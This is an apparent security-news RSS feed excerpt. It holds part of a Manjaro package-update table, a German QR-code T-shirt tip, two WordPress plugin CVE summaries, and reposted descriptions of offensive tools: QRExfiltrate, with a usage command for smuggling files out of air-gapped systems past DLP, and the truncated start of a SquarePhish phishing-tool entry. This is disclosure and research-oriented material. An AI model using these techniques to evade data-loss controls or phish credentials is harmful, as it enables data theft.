                               stack            2.7.5-341            2.7.5-342
       switchboard-plug-applications              7.0.0-1              7.0.1-1
                         syndication            5.109.0-1            5.110.0-1
                 syntax-highlighting            5.109.0-1            5.110.0-1
                      systemsettings             5.27.7-1             5.27.8-1
                            taffybar            4.0.0-144            4.0.0-145
                           tailscale             1.48.1-2             1.48.2-1
                      tamarin-prover              1.8.0-3              1.8.0-4
                             taskell           1.11.4-356           1.11.4-357
                        threadweaver            5.109.0-1            5.110.0-1
                         thunderbird            115.2.0-3            115.2.0-4
                 thunderbird-i18n-af            115.2.0-3            115.2.0-4
                 thunderbird-i18n-ar            115.2.0-3            115.2.0-4
                thunderbird-i18n-ast            115.2.0-3            115.2.0-4
                 thunderbird-i18n-be            115.2.0-3            115.2.0-4
                 thunderbird-i18n-bg            115.2.0-3            115.2.0-4
                 thunderbird-i18n-br            115.2.0-3            115.2.0-4
                 thunderbird-i18n-ca            115.2.0-3            115.2.0-4
                thunderbird-i18n-cak            115.2.0-3            115.2.0-4
                 thunderbird-i18n-cs            115.2.0-3            115.2.0-4
                 thunderbird-i18n-cy            115.2.0-3            115.2.0-4
                 thunderbird-i18n-da            115.2.0-3            115.2.0-4
                 thunderbird-i18n-de            115.2.0-3            115.2.0-4
                thunderbird-i18n-dsb            115.2.0-3            115.2.0-4
                 thunderbird-i18n-el            115.2.0-3            115.2.0-4
              thunderbird-i18n-en-gb            115.2.0-3            115.2.0-4
              thunderbird-i18n-en-us            115.2.0-3            115.2.0-4
              thunderbird-i18n-es-ar            115.2.0-3            115.2.0-4
              thunderbird-i18n-es-es            115.2.0-3            115.2.0-4
                 thunderbird-i18n-et            115.2.0-3            115.2.0-4
                 thunderbird-i18n-eu            115.2.0-3            115.2.0-4
                 thunderbird-i18n-fi            115.2.0-3            115.2.0-4
                 thunderbird-i18n-fr            115.2.0-3            115.2.0-4
              thunderbird-i18n-fy-nl            115.2.0-3            115.2.0-4
              thunderbird-i18n-ga-ie            115.2.0-3            115.2.0-4
                 thunderbird-i18n-gd            115.2.0-3            115.2.0-4
                 thunderbird-i18n-gl            115.2.0-3            115.2.0-4
                 thunderbird-i18n-he            115.2.0-3            115.2.0-4
                 thunderbird-i18n-hr            115.2.0-3            115.2.0-4
                thunderbird-i18n-hsb            115.2.0-3            115.2.0-4
                 thunderbird-i18n-hu            115.2.0-3            115.2.0-4
              thunderbird-i18n-hy-am            115.2.0-3            115.2.0-4
                 thunderbird-i18n-id            115.2.0-3            115.2.0-4
                 thunderbird-i18n-is            115.2.0-3            115.2.0-4
                 thunderbird-i18n-it            115.2.0-3            115.2.0-4
                 thunderbird-i18n-ja            115.2.0-3            115.2.0-4
                 thunderbird-i18n-ka            115.2.0-3            115.2.0-4
                thunderbird-i18n-kab            115.2.0-3            115.2.0-4
                 thunderbird-i18n-kk            115.2.0-3            115.2.0-4
                 thunderbird-i18n-ko            115.2.0-3            115.2.0-4
                 thunderbird-i18n-lt            115.2.0-3            115.2.0-4
                 thunderbird-i18n-ms            115.2.0-3            115.2.0-4
              thunderbird-i18n-nb-no            115.2.0-3            115.2.0-4
                 thunderbird-i18n-nl            115.2.0-3            115.2.0-4
              thunderbird-i18n-nn-no            115.2.0-3            115.2.0-4
              thunderbird-i18n-pa-in            115.2.0-3            115.2.0-4
                 thunderbird-i18n-pl            115.2.0-3            115.2.0-4
              thunderbird-i18n-pt-br            115.2.0-3            115.2.0-4
              thunderbird-i18n-pt-pt            115.2.0-3            115.2.0-4
                 thunderbird-i18n-rm            115.2.0-3            115.2.0-4
                 thunderbird-i18n-ro            115.2.0-3            115.2.0-4
                 thunderbird-i18n-ru            115.2.0-3            115.2.0-4
                 thunderbird-i18n-sk            115.2.0-3            115.2.0-4
                 thunderbird-i18n-sl            115.2.0-3            115.2.0-4
                 thunderbird-i18n-sq            115.2.0-3            115.2.0-4
                 thunderbird-i18n-sr            115.2.0-3            115.2.0-4
              thunderbird-i18n-sv-se            115.2.0-3            115.2.0-4
                 thunderbird-i18n-th            115.2.0-3            115.2.0-4
                 thunderbird-i18n-tr            115.2.0-3            115.2.0-4
                 thunderbird-i18n-uk            115.2.0-3            115.2.0-4
                 thunderbird-i18n-uz            115.2.0-3            115.2.0-4
                 thunderbird-i18n-vi            115.2.0-3            115.2.0-4
              thunderbird-i18n-zh-cn            115.2.0-3            115.2.0-4
              thunderbird-i18n-zh-tw            115.2.0-3            115.2.0-4
                                 tor            0.4.8.4-2            0.4.8.5-1
         v2ray-domain-list-community     20230905081311-1     20230911142809-1
                               vault             1.14.1-1             1.14.2-1
                            vbam-sdl              2.1.6-1              2.1.7-1
                             vbam-wx              2.1.6-1              2.1.7-1
                 vue-language-server             1.8.10-1             1.8.11-1
                              wimlib             1.14.2-1             1.14.3-1
                           wingpanel              3.0.3-5              3.0.4-1
              xdg-desktop-portal-kde             5.27.7-1             5.27.8-1
                              xmobar              0.46-65              0.46-66
                                yuzu               1553-1               1554-1
                                 zim             0.75.2-1             0.75.2-2
                     spectmorph-clap                    -              0.6.0-2


:: Different overlay package(s) in repository kde-unstable x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2023-09-11           2023-09-13
-------------------------------------------------------------------------------
                           alligator23.04.3.r588.g06a4136-123.04.3.r591.gdfc5602-1
                                 ark23.08.0.r5166.gd8d5f57d-123.08.0.r5168.g1db818f8-1
                              attica5.109.0.r916.g4e09a15-15.110.0.r916.g4e09a15-1
                               baloo5.109.0.r3321.g3a191f25-15.110.0.r3323.g8c10c6bd-1
                           bluedevil1:5.27.7.r2714.g7581da37-11:5.27.7.r2717.g6c156e3d-1
                            bluez-qt5.109.0.r762.gfe828b8-15.110.0.r762.gfe828b8-1
                          breeze-gtk5.27.6.r512.gcbab51e-15.27.7.r515.g16de40e-1
                        breeze-icons5.109.0.r2042.ge3e3fa34-15.110.0.r2043.g386f450f-1
                           calindori23.04.3.r780.gf544d5d-123.04.3.r781.gcaa69f9-1
                              dragon23.08.0.r1240.gcc6f49d-123.08.0.r1241.ge77581a-1
                             drkonqi5.27.7.r1084.ge1235699-15.27.7.r1085.g4a3a4945-1
                 extra-cmake-modules5.109.0.r3621.g4441211d-15.110.0.r3622.ged9b7b7e-1
                frameworkintegration5.109.0.r707.gcf4c809-15.110.0.r707.gcf4c809-1
                                 k3b1:23.08.0.r7065.ge54a52fad-11:23.08.0.r7066.g4b94c7880-1
                         kactivities5.109.0.r1443.g8ed069dd-15.110.0.r1443.g8ed069dd-1
                   kactivities-stats5.109.0.r443.g4ae5637-15.110.0.r443.g4ae5637-1
                            kalgebra23.08.0.r2193.g5aea4c5a-123.08.0.r2194.g2932c0bd-1
                                kalk23.04.3.r727.g015c8d2-123.04.3.r729.g4e13604-1
                             kapidox5.109.0.r586.gb6708c9-15.110.0.r586.gb6708c9-1
                            karchive5.109.0.r686.g98f538a-15.110.0.r686.g98f538a-1
                               kasts23.04.3.r1356.g5a2ceb0-123.04.3.r1358.g2abfd0f-1
                               kauth5.109.0.r589.gc590901-15.110.0.r589.gc590901-1
                          kbookmarks5.109.0.r579.gb623ae8-15.110.0.r580.gcf14657-1
                               kcalc23.08.0.r1766.g0d6fca4-123.08.0.r1767.g72b1f08-1
                       kcalendarcore5.109.0.r1388.g29055998c-15.110.0.r1388.g29055998c-1
                              kclock23.04.3.r1046.g401f635-123.04.3.r1047.g8b9df04-1
                            kcmutils5.109.0.r984.gd857f6ae-15.110.0.r984.gd857f6ae-1
                             kcodecs5.109.0.r517.g8a68fbe-15.110.0.r517.g8a68fbe-1
                        kcolorscheme5.109.0.r142.g079699a-15.110.0.r142.g079699a-1
                         kcompletion5.109.0.r585.g0d45bc7-15.110.0.r585.g0d45bc7-1
                             kconfig5.109.0.r1157.g23b1755f-15.110.0.r1161.g1fac1177-1
                      kconfigwidgets5.109.0.r948.g4caf5e84-15.110.0.r949.g87f19caf-1
                           kcontacts1:5.109.0.r3450.g087467d5-11:5.110.0.r3450.g087467d5-1
                         kcoreaddons5.109.0.r1890.g02763981-15.110.0.r1895.gfe6226d0-1
                              kcrash5.109.0.r483.g5401330-15.110.0.r483.g5401330-1
                               kcron23.08.0.r945.gc6ffa10-123.08.0.r947.gfd44d80-1
                                kdav1:5.109.0.r1420.g9d47634-11:5.110.0.r1420.g9d47634-1
                         kdbusaddons5.109.0.r501.g0bfce58-15.110.0.r501.g0bfce58-1
                       kde-cli-tools5.27.7.r2211.g5637acb-15.27.7.r2212.g658555e-1
                      kdebugsettings23.08.0.r1416.gda9375e-123.08.0.r1417.gb226c09-1
                        kdeclarative5.109.0.r1204.g4dff87ac-15.110.0.r1204.g4dff87ac-1
                                kded5.109.0.r526.g1cfc333-15.110.0.r526.g1cfc333-1
              kdenetwork-filesharing23.08.0.r1118.gc9197f4-123.08.0.r1119.g3903329-1
                            kdenlive23.08.0.r18689.ged07c42bd-123.08.0.r18706.g968eb4d2a-1
                    kdeplasma-addons5.27.7.r9709.gef422dce8-15.27.7.r9711.g2e5d6b9ca-1
                               kdesu5.109.0.r587.g5d64666-15.110.0.r587.g5d64666-1
                              kdnssd5.109.0.r420.g64efaca-15.110.0.r420.g64efaca-1
                           kdoctools5.109.0.r773.gc5956a2-15.110.0.r774.g8639560-1
                       kfilemetadata5.109.0.r1016.ge437777-15.110.0.r1016.ge437777-1
                             kgamma55.27.7.r568.gd39176f-15.27.7.r569.g009f43e-1
                        kglobalaccel5.109.0.r683.g40c5e39-15.110.0.r683.g40c5e39-1
                          kguiaddons5.109.0.r563.g00ec909-15.110.0.r563.g00ec909-1
                           kholidays1:5.109.0.r1203.g59c1de8-11:5.110.0.r1203.g59c1de8-1
                               ki18n5.109.0.r670.g3b95046-15.110.0.r670.g3b95046-1
                         kiconthemes5.109.0.r726.gc346eb0-15.110.0.r726.gc346eb0-1
                 kidentitymanagement23.08.0.r4101.gde03bad3-123.08.0.r4102.gac706f23-1
                           kidletime5.109.0.r409.g5bf73aa-15.110.0.r409.g5bf73aa-1
                       kimageformats5.109.0.r524.g0a6fbd8-15.110.0.r525.g75e1280-1
                     kimagemapeditor23.08.0.r625.g5a7bdba-123.08.0.r626.gd345ce3-1
                         kinfocenter5.27.7.r2502.g21a64481-15.27.7.r2504.g9e299e00-1
                                 kio5.109.0.r6543.g788f698d1-15.110.0.r6549.ge94488166-1
                     kirigami-addons1:0.11.0.r34.g6183b9d-11:0.11.0.r37.g73c06dd-1
                           kirigami25.109.0.r3996.gb373cce0-15.110.0.r4001.gb6426ad2-1
                         kitemmodels5.109.0.r674.g549cbee-15.110.0.r674.g549cbee-1
                          kitemviews5.109.0.r456.g41d6f58-15.110.0.r456.g41d6f58-1
                         kjobwidgets5.109.0.r512.ge56e101-15.110.0.r513.g66a9f4f-1
                           kmenuedit5.27.7.r1223.g0d2d3e8-15.27.7.r1224.g589a83f-1
                           knewstuff5.109.0.r1671.g533a3833-15.110.0.r1671.g533a3833-1
                      knotifications5.109.0.r908.g8d6373b-15.110.0.r908.g8d6373b-1
                       knotifyconfig5.109.0.r474.g53f47b3-15.110.0.r474.g53f47b3-1
                                kolf23.08.0.r1641.g25bd128-123.08.0.r1642.g22c2de5-1
                         kolourpaint23.08.0.r2580.gfe0830c2-123.08.0.r2582.g375a0dcf-1
                             kompare23.08.0.r1320.gb8e08d0-123.08.0.r1321.g561e022-1
                             konsole23.08.0.r9176.g6a259e3a6-123.08.0.r9180.ga1773777a-1
                       kosmindoormap23.08.0.r1079.gff0c010-123.08.0.r1080.g5026801-1
                            kpackage5.109.0.r942.g075b83f-15.110.0.r942.g075b83f-1
                              kparts5.109.0.r756.g20b6514-15.110.0.r756.g20b6514-1
                             kpeople5.109.0.r1456.g334c302-15.110.0.r1456.g334c302-1
                           kplotting5.109.0.r358.gaea878d-15.110.0.r358.gaea878d-1
                             kpmcore23.08.0.r1421.g536db6d-123.08.0.r1423.gc151117-1
                                kpty5.109.0.r446.g7229e06-15.110.0.r446.g7229e06-1
                        kquickcharts5.109.0.r579.g34bbef0-15.110.0.r579.g34bbef0-1
                              kruler23.08.0.r886.ga4742b2-123.08.0.r887.g5ee5da2-1
                             krunner5.109.0.r1016.gabad0b0-15.110.0.r1016.gabad0b0-1
                             kscreen5.27.7.r1834.gd804471-15.27.7.r1835.gf8ad84a-1
                            kservice5.109.0.r1184.g6d5956a3-15.110.0.r1184.g6d5956a3-1
                 kstatusnotifieritem5.109.0.r120.g86a3ec4-15.110.0.r120.g86a3ec4-1
                                ksvg5.109.0.r5080.gf49e0f8d-15.110.0.r5081.g2a9dfd2c-1
                         ktextaddons23.08.0.r783.gfdee3fc-123.08.0.r787.g1241a89-1
                         ktexteditor5.109.0.r4133.ge002bb1f-15.110.0.r4134.g6fc78c54-1
                       ktexttemplate5.109.0.r1611.g74c03a0-15.110.0.r1611.g74c03a0-1
                        ktextwidgets5.109.0.r546.g0033d3e-15.110.0.r546.g0033d3e-1
                          ktuberling23.08.0.r1206.g2a7a47f-123.08.0.r1208.g41ad753-1
                     kunitconversion5.109.0.r551.gd4d7b11-15.110.0.r551.gd4d7b11-1
                             kwallet5.109.0.r1324.gcfcfd0c3-15.110.0.r1324.gcfcfd0c3-1
                            kwayland5.109.0.r1225.g03bea7b-15.110.0.r1225.g03bea7b-1
                      kwidgetsaddons5.109.0.r1183.ge5ef8184-15.110.0.r1183.ge5ef8184-1
                                kwin5.27.7.r25189.g32ae9dd7d1-15.27.7.r25204.g14f6103373-1
                       kwindowsystem5.109.0.r803.gb59a819-15.110.0.r803.gb59a819-1
                             kxmlgui5.109.0.r1097.g1b09b507-15.110.0.r1097.g1b09b507-1
                        libksysguard5.27.7.r2714.gfbe650c9-15.27.7.r2718.gf852c7bc-1
                         libquotient    r3242.g14247aff-1    r3247.ga313422d-1
                     modemmanager-qt5.109.0.r595.g2b7a359-15.110.0.r595.g2b7a359-1
                             neochat23.04.3.r3580.gb2f592afe-123.04.3.r3595.g8285961c4-1
                   networkmanager-qt5.109.0.r1205.g41b6082-15.110.0.r1205.g41b6082-1
                        oxygen-icons1:5.109.0.r5.gbff159d-11:5.110.0.r5.gbff159d-1
                    oxygen-icons-svg1:5.109.0.r5.gbff159d-11:5.110.0.r5.gbff159d-1
                    partitionmanager23.08.0.r1844.g140ad7e-123.08.0.r1845.gcb57a79-1
                      plasma-desktop5.27.7.r10872.gf693faca8-15.27.7.r10875.g295a704c6-1
                        plasma-disks5.27.7.r428.gc148ff5-15.27.7.r429.ge658dcb-1
                     plasma-firewall5.27.7.r783.ge579112-15.27.7.r784.gdcd18c4-1
                    plasma-framework5.109.0.r16906.gbf8932f29-15.110.0.r16930.g3c20fe801-1
                  plasma-integration5.27.7.r707.g5a1fe37-15.27.8.r707.g5a1fe37-1
                    plasma-mobile-nm5.27.7.r3759.g9c17077d-15.27.7.r3761.gbce38c0a-1
                         plasma-nano5.27.7.r308.g52d1113-15.27.7.r309.g0d7ca7b-1
                           plasma-nm5.27.7.r3759.g9c17077d-15.27.7.r3761.gbce38c0a-1
                          plasma-sdk5.27.7.r2654.geba19560-15.27.7.r2655.gc6a3a990-1
                     plasma-settings23.04.3.r1335.g8e3a63c-123.04.3.r1337.g6be0b35-1
                plasma-systemmonitor5.27.7.r827.g1312f7d-15.27.7.r837.gebe47b1-1
              plasma-wayland-session5.27.7.r14341.g0e658f27d-15.27.7.r14390.g960660233-1
                    plasma-workspace5.27.7.r14341.g0e658f27d-15.27.7.r14390.g960660233-1
                          polkit-qt65.109.0.r403.g590e710-15.110.0.r403.g590e710-1
                          powerdevil5.27.7.r2930.gbbcac9bc-15.27.7.r2945.g99769981-1
                       print-manager23.08.0.r1326.ge8df045-123.08.0.r1328.gf90bd90-1
                              prison5.109.0.r456.gf6c6764-15.110.0.r456.gf6c6764-1
                             purpose5.109.0.r1147.g9cabf08d-15.110.0.r1147.g9cabf08d-1
                  qqc2-desktop-style5.109.0.r819.g89bbfb4-15.110.0.r820.g436d456-1
                            sddm-kcm5.27.7.r857.g17f5d98-15.27.7.r858.g700ae2e-1
                               solid5.109.0.r932.g1dc8f437-15.110.0.r932.g1dc8f437-1
                              sonnet5.109.0.r843.g7d8d27d-15.110.0.r843.g7d8d27d-1
                             svgpart23.08.0.r316.gb8b7b28-123.08.0.r317.gd032be5-1
                         syndication5.109.0.r913.g3a284d4-15.110.0.r913.g3a284d4-1
                 syntax-highlighting5.109.0.r2343.g300a5b8e-15.110.0.r2357.g4738874e-1
                      systemsettings5.27.7.r3016.g743e9716-15.27.7.r3018.gccea6be7-1
                        threadweaver5.109.0.r588.gff9006f-15.110.0.r588.gff9006f-1
              xdg-desktop-portal-kde5.27.7.r830.gfc716f2-15.27.7.r833.g49ba60f-1
                             ksudoku                    -23.08.0.r1236.g44331b4-1


:: Different overlay package(s) in repository multilib x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2023-09-11           2023-09-13
-------------------------------------------------------------------------------
                               steam           1.0.0.78-2           1.0.0.78-3


:: Different sync package(s) in repository multilib x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2023-09-11           2023-09-13
-------------------------------------------------------------------------------
                         lib32-glib2             2.78.0-1             2.78.0-2
                       lib32-libwebp              1.3.1-1              1.3.1-2

</code></pre>
<p><a href="https://forum.manjaro.org/t/testing-update-2023-09-13-kernels-kde-frameworks-plasma-kde-git/147907/1">Click to view the poll.</a></p>
<p>Check if your mirror has already synced:</p>
<ul>
<li><a href="https://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul>
            <p><small>8 posts - 6 participants</small></p>
            <p><a href="https://forum.manjaro.org/t/testing-update-2023-09-13-kernels-kde-frameworks-plasma-kde-git/147907">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Nachricht als QR-Code auf dem T-Shirt]]></title>
<description><![CDATA[Nachricht als QR-Code auf dem T-Shirt

      
      
        
          
            
                

            
          
        
              
    
  Redaktion IT-A…
Sa., 21.03.2020 - 00:00

            Wenn Sie raffiniert auf Ihre neue Webseite aufmerksam machen wollen oder eine Nachric...]]></description>
<link>https://tsecurity.de/de/1860613/server/nachricht-als-qr-code-auf-dem-t-shirt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1860613/server/nachricht-als-qr-code-auf-dem-t-shirt/</guid>
<pubDate>Wed, 12 Apr 2023 18:52:43 +0200</pubDate>
<category>🐧 Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<span class="field field--name-title field--type-string field--label-hidden">Nachricht als QR-Code auf dem T-Shirt</span>

      <div class="field field--name-field-image field--type-image field--label-hidden field__items">
      <div class="images-container clearfix">
        <div class="image-preview clearfix">
          <div class="image-wrapper clearfix">
            <div class="field__item">
                <a class="image-popup overlayed" href="https://www.it-administrator.de/article-319842"><img loading="lazy" src="https://www.it-administrator.de/sites/default/files/styles/medium/public/QRcode.jpg?itok=Il-qW1Yf" width="480" height="319" alt="Das T-Shirt mit QR-Code nutzt eine moderne Art der Kommunikation." title="Das T-Shirt mit QR-Code nutzt eine moderne Art der Kommunikation." typeof="foaf:Image" class="image-style-medium"><span class="overlay"><i class="fa fa-plus"></i></span></a>

            </div>
          </div>
        </div>
              </div>
    </div>
  <span class="field field--name-uid field--type-entity-reference field--label-hidden"><a title="Benutzerprofil anzeigen." href="https://www.it-administrator.de/user/108" lang="" about="https://www.it-administrator.de/user/108" typeof="schema:Person" property="schema:name" datatype="" content="Redaktion IT-Administrator" class="username" xml:lang="">Redaktion IT-A…</a></span>
<span class="field field--name-created field--type-created field--label-hidden">Sa., 21.03.2020 - 00:00</span>

            <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item">Wenn Sie raffiniert auf Ihre neue Webseite aufmerksam machen wollen oder eine Nachricht auf besondere Weise weitergeben möchten, kann das "QR-Code-T-Shirt" weiterhelfen. Das Kleidungstück ist mit einem QR-Code bedruckt, den die meisten modernen Smartphones als Text anzeigen können. Somit haben Sie die Möglichkeit, eine versteckte Botschaft auf dem T-Shirt zu tragen.</div>
      <div class="field field--name-field-mt-post-categories field--type-entity-reference field--label-hidden field--entity-reference-target-type-taxonomy-term clearfix">
    <ul class="links field__items"><li><a href="https://www.it-administrator.de/tips-tools" hreflang="en">Tipps &amp; Tools</a></li>
      </ul></div>  <div class="node__links">
    <ul class="links inline"><li class="node-readmore"><a href="https://www.it-administrator.de/article-319842" rel="tag" title="Nachricht als QR-Code auf dem T-Shirt" hreflang="en">Weiterlesen<span class="visually-hidden"> über Nachricht als QR-Code auf dem T-Shirt</span></a></li></ul></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[QRExfiltrate - Tool That Allows You To Convert Any Binary File Into A QRcode Movie. The Data Can Then Be Reassembled Visually Allowing Exfiltration Of Data In Air Gapped Systems]]></title>
<description><![CDATA[This tool is a command line utility that allows you to convert any binary file into a QRcode GIF. The data can then be reassembled visually allowing exfiltration of data in air gapped systems. It was designed as a proof of concept to demonstrate weaknesses in DLP software; that is, the assumption...]]></description>
<link>https://tsecurity.de/de/1835854/it-security-nachrichten/qrexfiltrate-tool-that-allows-you-to-convert-any-binary-file-into-a-qrcode-movie-the-data-can-then-be-reassembled-visually-allowing-exfiltration-of-data-in-air-gapped-systems/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1835854/it-security-nachrichten/qrexfiltrate-tool-that-allows-you-to-convert-any-binary-file-into-a-qrcode-movie-the-data-can-then-be-reassembled-visually-allowing-exfiltration-of-data-in-air-gapped-systems/</guid>
<pubDate>Sat, 25 Mar 2023 13:34:40 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgdlOiSoVpKzHp2ADAU1jUUM5dBjNVZTMFR24rypxQCLK1iDB7MVaFxM37QbEEJfjvtZkilLe8wC5PExw1NFdrhcAeZsDPVAjAKy_4TBOdY3j1b1gEuIOYRlelDBhNS7--kcqh2o7cvbuKgcyVltWmRP-FdITSV9fN7pIxV84PV3C5QvVQZXJl9K0zy2Q"><img alt="" border="0" src="https://blogger.googleusercontent.com/img/a/AVvXsEgdlOiSoVpKzHp2ADAU1jUUM5dBjNVZTMFR24rypxQCLK1iDB7MVaFxM37QbEEJfjvtZkilLe8wC5PExw1NFdrhcAeZsDPVAjAKy_4TBOdY3j1b1gEuIOYRlelDBhNS7--kcqh2o7cvbuKgcyVltWmRP-FdITSV9fN7pIxV84PV3C5QvVQZXJl9K0zy2Q=s16000"></a></p><p><br></p>  <p dir="auto">This tool is a <a href="https://www.kitploit.com/search/label/Command%20Line" target="_blank" title="command line">command line</a> utility that allows you to convert any binary file into a QRcode GIF. The data can then be reassembled visually allowing <a href="https://www.kitploit.com/search/label/Exfiltration" target="_blank" title="exfiltration">exfiltration</a> of data in air gapped systems. It was designed as a <a href="https://www.kitploit.com/search/label/Proof%20Of%20Concept" target="_blank" title="proof of concept">proof of concept</a> to demonstrate weaknesses in DLP software; that is, the assumption that data will leave the system via  email, USB sticks or other media.</p>  <p dir="auto">The tool works by taking a binary file and converting it into a series of <a href="https://www.kitploit.com/search/label/QR%20codes" target="_blank" title="QR codes">QR codes</a> images. These images are then combined into a GIF file that can be easily reassembled using any standard QR code reader. This allows data to be exfiltrated without detection from most DLP systems.</p><span><a name="more"></a></span><p dir="auto"><br></p>  <h2 dir="auto" tabindex="-1">How to Use</h2>  <p dir="auto">To use QRExfiltrate, open a command line and navigate to the <a href="https://www.kitploit.com/search/label/Directory" target="_blank" title="directory">directory</a> containing the QRExfiltrate scripts.</p>  <p dir="auto">Once you have done this, you can run the following command to convert your binary file into a QRcode GIF:</p>  <div><pre><code>./encode.sh ./draft-taddei-ech4ent-introduction-00.txt output.gif<br></code></pre></div>  <h2 dir="auto" tabindex="-1">Demo</h2>  <p dir="auto"><code>encode.sh &lt;inputfile&gt;</code></p>  <p dir="auto"><a href="https://github.com/Shell-Company/QRExfil/blob/main/output.gif" rel="nofollow" target="_blank" title="This tool is a command line utility that allows you to convert any binary file into a QRcode movie. The data can then be reassembled visually allowing exfiltration of data in air gapped systems  (6)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgdlOiSoVpKzHp2ADAU1jUUM5dBjNVZTMFR24rypxQCLK1iDB7MVaFxM37QbEEJfjvtZkilLe8wC5PExw1NFdrhcAeZsDPVAjAKy_4TBOdY3j1b1gEuIOYRlelDBhNS7--kcqh2o7cvbuKgcyVltWmRP-FdITSV9fN7pIxV84PV3C5QvVQZXJl9K0zy2Q"><img alt="" border="0" src="https://blogger.googleusercontent.com/img/a/AVvXsEgdlOiSoVpKzHp2ADAU1jUUM5dBjNVZTMFR24rypxQCLK1iDB7MVaFxM37QbEEJfjvtZkilLe8wC5PExw1NFdrhcAeZsDPVAjAKy_4TBOdY3j1b1gEuIOYRlelDBhNS7--kcqh2o7cvbuKgcyVltWmRP-FdITSV9fN7pIxV84PV3C5QvVQZXJl9K0zy2Q=s16000"></a></p>  <p dir="auto">Where <code>&lt;inputfile&gt;</code> is the path to the binary file you wish to convert, and <code>&lt;outputfile&gt;</code>, if no output is specified output.gif used is the path to the desired output GIF file.</p>  <p dir="auto">Once the command completes, you will have a GIF file containing the data from your binary file.</p>  <p dir="auto">You can then transfer this GIF file as you wish and reassemble the data using any standard QR code reader.</p>  <h2 dir="auto" tabindex="-1">Prerequisites</h2>  <p dir="auto">QRExfiltrate requires the following prerequisites:</p>  <ul dir="auto"><li>qrencode</li>  <li>ffmpeg</li>  </ul><h2 dir="auto" tabindex="-1">Limitations</h2>  <p dir="auto">QRExfiltrate is limited by the size of the source data,  qrencoding per frame has been capped to 64 bytes to ensure the resulting image has a uniform size and shape. Additionally the conversion to QR code results in a lot of storage overhead, on average the resulting gif is 50x larger than the original. Finally, QRExfiltrate is limited by the capabilities of the QR code reader. If the reader is not able to detect the QR codes from the GIF, the data will not be able to be reassembled.</p>  <blockquote>  <p dir="auto">The decoder script has been intentionally omitted</p>  </blockquote>  <h2 dir="auto" tabindex="-1">Conclusion</h2>  <p dir="auto">QRExfiltrate is a powerful tool that can be used to bypass DLP systems and exfiltrate data in air gapped networks. However, it is important to note that QRExfiltrate should be used with caution and only in situations where the risk of detection is low.</p>  <br><br><div><b><span><a class="kiploit-download" href="https://github.com/Shell-Company/QRExfil" rel="nofollow" target="_blank" title="Download QRExfil">Download QRExfil</a></span></b></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2023-0085]]></title>
<description><![CDATA[The Metform Elementor Contact Form Builder plugin for WordPress is vulnerable to reCaptcha Bypass in versions up to, and including, 3.2.1. This is due to insufficient server side checking on the captcha value submitted during a form submission. This makes it possible for unauthenticated attackers...]]></description>
<link>https://tsecurity.de/de/1812776/sicherheitsluecken/cve-2023-0085/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1812776/sicherheitsluecken/cve-2023-0085/</guid>
<pubDate>Tue, 07 Mar 2023 06:28:57 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Metform Elementor Contact Form Builder plugin for WordPress is vulnerable to reCaptcha Bypass in versions up to, and including, 3.2.1. This is due to insufficient server side checking on the captcha value submitted during a form submission. This makes it possible for unauthenticated attackers to bypass Captcha restrictions and for attackers to utilize bots to submit forms.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-3831 | reCAPTCHA Plugin up to 1.6 on WordPress Setting cross site scripting]]></title>
<description><![CDATA[A vulnerability classified as problematic has been found in reCAPTCHA Plugin up to 1.6. Affected is an unknown function of the component Setting Handler. The manipulation leads to cross site scripting.

This vulnerability is traded as CVE-2022-3831. It is possible to launch the attack remotely. T...]]></description>
<link>https://tsecurity.de/de/1745214/sicherheitsluecken/cve-2022-3831-recaptcha-plugin-up-to-16-on-wordpress-setting-cross-site-scripting/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1745214/sicherheitsluecken/cve-2022-3831-recaptcha-plugin-up-to-16-on-wordpress-setting-cross-site-scripting/</guid>
<pubDate>Fri, 23 Dec 2022 18:47:51 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/?kb.risk">problematic</a> has been found in <a href="https://vuldb.com/?product.recaptcha_plugin">reCAPTCHA Plugin up to 1.6</a>. Affected is an unknown function of the component <em>Setting Handler</em>. The manipulation leads to cross site scripting.

This vulnerability is traded as <a href="https://vuldb.com/?source_cve.214452">CVE-2022-3831</a>. It is possible to launch the attack remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Squarephish - An advanced phishing tool that uses a technique combining the OAuth Device code authentication flow and QR codes]]></title>
<description><![CDATA[SquarePhish is an advanced phishing tool that uses a technique combining the OAuth Device code authentication flow and QR codes.    See PhishInSuits for more details on using OAuth Device Code flow for phishing attacks.       _____                            _____  _     _     _       / ____|    ...]]></description>
<link>https://tsecurity.de/de/1741986/it-security-nachrichten/squarephish-an-advanced-phishing-tool-that-uses-a-technique-combining-the-oauth-device-code-authentication-flow-and-qr-codes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1741986/it-security-nachrichten/squarephish-an-advanced-phishing-tool-that-uses-a-technique-combining-the-oauth-device-code-authentication-flow-and-qr-codes/</guid>
<pubDate>Wed, 21 Dec 2022 16:16:18 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
